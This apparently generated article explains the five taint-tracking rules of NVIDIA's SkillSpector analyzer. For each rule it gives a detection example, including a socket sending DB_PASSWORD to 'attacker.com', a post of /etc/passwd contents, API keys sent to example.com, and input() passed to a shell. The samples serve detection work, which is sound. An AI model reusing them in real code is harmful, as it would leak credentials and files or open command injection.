# SkillSpector Taint Tracking Patterns (TT1-TT5): A Complete Security Analysis

> Explore SkillSpector's taint tracking patterns TT1-TT5 for security analysis. Detect unsafe data flows from sources to sinks with severity ratings from Medium to Critical. Understand vulnerabilities in NVIDIA/SkillSpector.

- Repository: [NVIDIA Corporation/SkillSpector](https://github.com/NVIDIA/SkillSpector)
- Tags: deep-dive
- Published: 2026-06-25

---

**SkillSpector implements five behavioral taint-tracking patterns (TT1-TT5) that detect unsafe data flows from sources like environment variables and user input to sinks like network outputs and code execution, with severity ratings ranging from Medium (0.65) to Critical (0.90).**

NVIDIA's SkillSpector is a Python security analyzer that identifies vulnerable data flows through behavioral taint tracking. The **SkillSpector taint tracking patterns** categorize how untrusted data propagates from sources to sinks, enabling detection of credential leaks, data exfiltration, and remote code execution vulnerabilities in Python source code.

## The Five SkillSpector Taint Tracking Patterns

According to the source code in [`src/skillspector/nodes/analyzers/pattern_defaults.py`](https://github.com/NVIDIA/SkillSpector/blob/main/src/skillspector/nodes/analyzers/pattern_defaults.py) (lines 95-100), SkillSpector defines five distinct taint-tracking patterns based on the source-sink combination and propagation path:

- **TT1 — Direct Source-to-Sink Flow**: Fires when a source call is used directly as an argument to a sink call (e.g., `requests.post(..., data=os.getenv("KEY"))`). Severity: **High** (0.80).
- **TT2 — Variable-Mediated Taint Flow**: Detects when source data is first assigned to a variable or container before reaching a sink (e.g., `secret = os.getenv("K"); requests.post(secret)`). Severity: **Medium** (0.65).
- **TT3 — Credential Exfiltration Flow**: Specifically identifies when credential-type sources (`os.getenv`, `os.environ`) flow to network-output sinks (`requests.post`, `socket.send`). Severity: **Critical** (0.90).
- **TT4 — File-Data Exfiltration Flow**: Triggers when file contents read from disk flow to network-output sinks. Severity: **High** (0.80).
- **TT5 — External Input → Execution Flow**: Detects external input (network requests or `input()`) flowing to execution sinks (`exec`, `subprocess.run`). Severity: **Critical** (0.90).

## How the Behavioral Taint Tracking Analyzer Works

The analyzer implementation in [`src/skillspector/nodes/analyzers/behavioral_taint_tracking.py`](https://github.com/NVIDIA/SkillSpector/blob/main/src/skillspector/nodes/analyzers/behavioral_taint_tracking.py) processes Python files through a multi-stage pipeline to detect these patterns.

### Source and Sink Catalogs

The analyzer maintains static sets of recognized **sources** and **sinks**:

- **Sources**: `_CREDENTIAL_SOURCES` (environment variables), `_FILE_READ_SOURCES` (file operations), `_NETWORK_INPUT_SOURCES` (network requests), and `_USER_INPUT_SOURCES` (`input()` calls).
- **Sinks**: `_NETWORK_OUTPUT_SINKS` (HTTP requests, sockets), `_EXEC_SINKS` (code execution), and `_FILE_WRITE_SINKS` (file operations).

### AST Parsing and Taint Propagation

Each file is parsed using `ast.parse` and examined node-by-node. When an `ast.Assign` node contains a source call, the left-hand side variables are marked as `_TaintedVar`. Taint propagates through literals, containers, and f-strings.

### Detection and Rule Selection

For every function call matching a sink name, the analyzer checks:

1. **Direct flows**: Via `_find_nested_sources` to identify source calls passed directly as arguments.
2. **Indirect flows**: Via `_find_tainted_names_in_args` to detect previously tainted variables in argument lists.

The `_pick_rule` function (lines 80-88) maps the source-sink pair to the appropriate TT-ID based on whether the flow is direct or mediated. Findings are emitted via `_emit` (lines 15-33) as `AnalyzerFinding` objects containing the rule ID, line number, confidence score, and severity.

## Code Examples for Each Taint Pattern

### TT1: Direct Source-to-Sink Flow

When a credential source is passed directly to a network sink, TT1 fires with high confidence:

```python
import os
import requests

# Direct flow: credential source → network output sink

requests.post("https://example.com/collect", data=os.getenv("API_KEY"))

```

Running SkillSpector on this code reports **TT1** because `os.getenv` (source) is passed directly to `requests.post` (sink).

### TT2: Variable-Mediated Taint Flow

TT2 detects taint propagation through intermediate variables:

```python
import os
import requests

# Variable-mediated flow

secret = os.getenv("API_KEY")      # source assignment

payload = {"token": secret}        # taint propagates to container

requests.post("https://example.com/collect", json=payload)   # sink

```

The analyzer marks `secret` as tainted during assignment, tracks its propagation into `payload`, and reports **TT2** when the tainted data reaches the sink.

### TT3: Credential Exfiltration Flow

TT3 specifically targets credential theft via network exfiltration:

```python
import os
import socket

# Credential exfiltration: environment variable → network socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("attacker.com", 9999))
sock.send(os.environ["DB_PASSWORD"].encode())

```

This triggers **TT3** (Critical/0.90) because `os.environ` (credential source) flows to `socket.send` (network output).

### TT4: File-Data Exfiltration Flow

TT4 identifies sensitive file content being sent over the network:

```python
import requests

with open("/etc/passwd", "r") as f:
    data = f.read()

# File data exfiltration

requests.post("https://example.com/upload", data=data)

```

The flow from file read to network output generates a **TT4** finding.

### TT5: External Input to Execution Flow

TT5 detects command injection vulnerabilities:

```python
import subprocess

# External input (user) → execution sink

user_cmd = input("Enter command: ")
subprocess.run(user_cmd, shell=True)    # exec sink

```

Because `input()` is a recognized external-input source and `subprocess.run` is an execution sink, this triggers **TT5** (Critical/0.90).

## Key Implementation Files

The taint-tracking functionality is distributed across these modules:

- **[`src/skillspector/nodes/analyzers/behavioral_taint_tracking.py`](https://github.com/NVIDIA/SkillSpector/blob/main/src/skillspector/nodes/analyzers/behavioral_taint_tracking.py)**: Core analyzer containing `node(state)` (entry point, lines 4-5) and `_analyze_python` (lines 101-200), which implements the AST traversal and taint propagation logic.
- **[`src/skillspector/nodes/analyzers/pattern_defaults.py`](https://github.com/NVIDIA/SkillSpector/blob/main/src/skillspector/nodes/analyzers/pattern_defaults.py)**: Registry of pattern definitions and remediation guidance for TT1-TT5 (lines 95-100).
- **[`src/skillspector/nodes/analyzers/common.py`](https://github.com/NVIDIA/SkillSpector/blob/main/src/skillspector/nodes/analyzers/common.py)**: Utility functions for import-alias handling and name resolution used during taint analysis.
- **[`src/skillspector/models.py`](https://github.com/NVIDIA/SkillSpector/blob/main/src/skillspector/models.py)**: Definition of `AnalyzerFinding`, `Severity`, and other data models emitted by the analyzer.

## Summary

- SkillSpector defines **five taint-tracking patterns** (TT1-TT5) to categorize unsafe data flows in Python code.
- **TT1** and **TT2** distinguish between direct and variable-mediated flows, while **TT3-TT5** identify specific high-risk combinations (credentials, file data, and code execution).
- The analyzer uses AST parsing to track taint from predefined sources to sinks, with confidence scores ranging from **0.65 (Medium)** to **0.90 (Critical)**.
- Implementation resides primarily in [`behavioral_taint_tracking.py`](https://github.com/NVIDIA/SkillSpector/blob/main/behavioral_taint_tracking.py), with pattern definitions in [`pattern_defaults.py`](https://github.com/NVIDIA/SkillSpector/blob/main/pattern_defaults.py).

## Frequently Asked Questions

### What is the difference between TT1 and TT2 in SkillSpector?

**TT1 (Direct Source-to-Sink)** fires when a source function is called directly inside a sink function's arguments, while **TT2 (Variable-Mediated)** detects when source data is stored in a variable or container before reaching a sink. TT1 has higher confidence (0.80) than TT2 (0.65) because direct flows lack sanitization opportunities that variable assignment might provide.

### How does SkillSpector determine the severity of a taint tracking finding?

Severity is determined by the source-sink combination defined in `_pick_rule` (lines 80-88 of [`behavioral_taint_tracking.py`](https://github.com/NVIDIA/SkillSpector/blob/main/behavioral_taint_tracking.py)). **Credential exfiltration (TT3)** and **external input to execution (TT5)** receive Critical severity (0.90) due to their high security impact, while **variable-mediated flows (TT2)** receive Medium severity (0.65) because indirect propagation may include sanitization steps.

### Can SkillSpector track taint through complex data structures?

Yes. According to the analyzer implementation, taint propagates through literals, containers (lists, dictionaries), and f-strings. When a tainted variable is assigned to a container like `payload = {"token": secret}`, the analyzer tracks the taint into the container and reports the appropriate pattern when the container is passed to a sink.

### Where are the taint tracking patterns defined in the SkillSpector codebase?

The pattern definitions, including names, descriptions, and remediation guidance for TT1-TT5, are stored in [`src/skillspector/nodes/analyzers/pattern_defaults.py`](https://github.com/NVIDIA/SkillSpector/blob/main/src/skillspector/nodes/analyzers/pattern_defaults.py) at lines 95-100. The detection logic that maps source-sink pairs to these pattern IDs is implemented in [`src/skillspector/nodes/analyzers/behavioral_taint_tracking.py`](https://github.com/NVIDIA/SkillSpector/blob/main/src/skillspector/nodes/analyzers/behavioral_taint_tracking.py) within the `_pick_rule` function.